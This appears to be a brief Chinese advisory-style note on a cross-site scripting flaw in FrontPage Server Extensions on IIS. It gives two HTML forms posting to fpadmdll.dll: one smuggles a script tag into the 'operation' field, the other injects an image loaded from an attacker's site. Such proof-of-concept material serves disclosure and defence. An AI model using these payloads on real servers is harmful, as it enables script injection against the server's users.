攻击者可以创建POST到FPSE服务器的FROM,并在客户端系统执行脚本。
<form action=http://iisserver/_vti_bin/_vti_adm/fpadmdll.dll method="POST"> <input type="hidden" name="operation" value="--><script>alert()</script>"> <input type="hidden" name="action" value="none"> <input type="hidden" name="port" value="/LM/W3SVC/1:"> <input type="submit" name="page" value="healthrp.htm"> </form>
此外,攻击者还可以从控制的站点注入图形。
<form action=http://iisserver/_vti_bin/_vti_adm/fpadmdll.dll method="POST"> <input type="hidden" name="operation" value="--><img src=http://hackersite/image.jpg>"> <input type="hidden" name="action" value="none"> <input type="hidden" name="port" value="/LM/W3SVC/1:"> <input type="submit" name="page" value="healthrp.htm"> </form> |